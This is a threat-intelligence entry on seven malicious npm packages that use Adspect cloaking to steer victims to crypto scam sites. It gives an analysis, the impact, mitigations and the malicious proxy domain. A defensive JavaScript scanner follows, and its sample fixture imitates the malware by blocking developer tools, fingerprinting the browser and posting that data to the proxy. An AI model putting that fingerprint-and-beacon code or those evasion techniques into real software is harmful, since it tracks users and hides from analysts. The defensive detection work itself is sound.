
Seven npm Packages Use Adspect Cloaking to Trick Victims Into Crypto Scam Pages

Severity: Medium
Category: Phishing
Published: Tue Nov 18 2025 (11/18/2025, 10:37:00 UTC)
Source: The Hacker News

Description

Cybersecurity researchers have discovered a set of seven npm packages published by a single threat actor that leverages a cloaking service called Adspect to differentiate between real victims and security researchers to ultimately redirect them to sketchy crypto-themed sites. The malicious npm packages, published by a threat actor named "dino_reborn" between September and November 2025, are

AI-Powered Analysis

Last updated: 11/18/2025, 21:02:52 UTC

Technical Analysis

Cybersecurity researchers identified seven npm packages published by a single threat actor, "dino_reborn," between September and November 2025, which use a cloaking service called Adspect to selectively target victims while evading security researchers. These packages contain malicious JavaScript code executed immediately upon import via Immediately Invoked Function Expressions (IIFE). The malware captures detailed system fingerprints and blocks developer tools in browsers to prevent analysis. It sends this fingerprint data to a proxy server to determine if the visitor is a real victim or a security researcher. Real victims are shown a fake CAPTCHA; upon interaction, they are redirected to fraudulent cryptocurrency-themed websites impersonating legitimate services like StandX, aiming to steal digital assets. Researchers and automated tools are served benign decoy pages with fake privacy policies to avoid detection. One package, "signals-embed," acts as a decoy without malicious payload. The npm account hosting these packages has been removed, but the packages had accumulated hundreds of downloads, indicating potential exposure. Adspect, the cloaking service used, is a commercial product designed to protect ad campaigns from unwanted traffic and offers “bulletproof cloaking” with no content restrictions, facilitating abuse by threat actors. This attack represents a novel combination of supply chain compromise, traffic cloaking, and anti-research techniques embedded in open-source packages, complicating detection and mitigation efforts.

Potential Impact

European organizations using npm packages in their software supply chain could inadvertently introduce this malware into their environments, leading to exposure of developers or users to crypto scam sites and potential theft of digital assets. The attack undermines trust in open-source components and complicates supply chain security efforts. Organizations relying on JavaScript packages for web or backend development risk executing malicious code that can evade detection by security teams due to cloaking and anti-analysis features. The phishing component targeting cryptocurrency users could lead to financial losses and reputational damage. Additionally, the malware’s ability to block developer tools and fingerprint systems hinders incident response and forensic investigations. This threat could impact software development firms, fintech companies, and enterprises with active crypto asset management or blockchain-related projects. The medium severity reflects the phishing nature and supply chain vector, which, while not directly causing system compromise or data breaches, can facilitate fraud and financial theft.

Mitigation Recommendations

European organizations should implement strict supply chain security controls including:

1) Enforce strict vetting and approval processes for npm packages, especially those newly published or from unknown authors;
2) Use automated tools to scan dependencies for malicious behavior and unusual network communications, focusing on traffic cloaking and fingerprinting indicators;
3) Employ runtime application self-protection (RASP) and browser security tools that can detect and block suspicious JavaScript behaviors such as developer tool blocking and immediate execution of unknown code;
4) Monitor network traffic for connections to suspicious proxy domains like "association-google[.]xyz" and block them at the network perimeter;
5) Educate developers on the risks of supply chain attacks and encourage use of package integrity verification (e.g., checksums, signed packages);
6) Maintain an allowlist of trusted packages and consider using private registries or mirrors to control package sources;
7) Conduct regular audits of dependencies and remove unused or suspicious packages;
8) Collaborate with security researchers and npm maintainers to report and remove malicious packages promptly;
9) For organizations dealing with cryptocurrency, implement multi-factor authentication and transaction monitoring to detect fraudulent activities;
10) Use sandbox environments to test new packages before deployment to production.
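As an added defensive example (not code from the article or from the packages it describes), here is the kind of heuristic pre-install scan that recommendation 2 calls for, keyed to the behaviours the technical analysis lists: an IIFE that runs on import, browser fingerprinting, developer-tools blocking, and a beacon to the cloaking proxy. The regexes, weights and threshold are assumptions about how such behaviour typically shows up in source; only the proxy domain comes from the report, and the sample package contents are constructed.

```javascript
// Heuristic static scan of a package's JavaScript for the behaviours the
// analysis describes: code run on import via an IIFE, browser fingerprinting,
// developer-tools blocking, and a beacon to the cloaking proxy domain.
// The regexes, weights and threshold are assumptions (typical source-level
// signs of those behaviours); only the proxy domain comes from the report.
const INDICATORS = [
  { name: "top-level IIFE", weight: 1,
    re: /^\s*[(!]\s*(?:async\s+)?(?:function\b|\([^)]*\)\s*=>)/m },
  { name: "devtools blocking", weight: 2,
    re: /\bdebugger\b|keyCode\s*===?\s*123|["']F12["']|contextmenu/ },
  { name: "fingerprinting", weight: 2,
    re: /navigator\.(?:userAgent|hardwareConcurrency|plugins|languages)|screen\.(?:width|height)/ },
  { name: "proxy beacon", weight: 3, re: /association-google\.xyz/ },
  { name: "fake CAPTCHA", weight: 1, re: /captcha/i },
];

// Returns which indicators fired and a weighted score; a file is flagged when
// the score reaches THRESHOLD, so a lone IIFE or CAPTCHA string is not enough.
const THRESHOLD = 4;
function scanSource(src) {
  const hits = INDICATORS.filter(i => i.re.test(src));
  const score = hits.reduce((s, i) => s + i.weight, 0);
  return { hits: hits.map(i => i.name), score, suspicious: score >= THRESHOLD };
}

// Scans every .js/.mjs file of a package (filename -> source) and reports
// only the flagged ones, so this can gate a pre-install review step.
function scanPackage(files) {
  return Object.entries(files)
    .filter(([name]) => /\.m?js$/.test(name))
    .map(([name, src]) => ({ file: name, ...scanSource(src) }))
    .filter(r => r.suspicious);
}

// Constructed sample inputs: one file mimics the described behaviour, one is
// benign, and a non-JS file with a CAPTCHA string is skipped by the filter.
const SAMPLE_PACKAGE = {
  "index.js": `
(function () {
  document.addEventListener("keydown", e => { if (e.keyCode === 123) e.preventDefault(); });
  const fp = { ua: navigator.userAgent, cores: navigator.hardwareConcurrency, w: screen.width };
  fetch("https://association-google.xyz/check", { method: "POST", body: JSON.stringify(fp) });
})();
`,
  "util.js": `
export function add(a, b) { return a + b; }
`,
  "README.md": "Solve the CAPTCHA to continue",
};

console.log(JSON.stringify(scanPackage(SAMPLE_PACKAGE), null, 2));
```

Because the cloaking decision happens server-side, a static scan like this catches the client-side preconditions (fingerprint collection and the beacon), not the scam page itself, so pair it with the network-perimeter blocking in recommendation 4.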


Technical Details

Article Source: https://thehackernews.com/2025/11/seven-npm-packages-use-adspect-cloaking.html (fetched 2025-11-18T21:01:28Z, 1146 words)

Threat ID: 691cdeaa90fff14d7012a9eb

Added to database: 11/18/2025, 9:01:30 PM

Last enriched: 11/18/2025, 9:02:52 PM

Last updated: 11/21/2025, 3:29:14 PM

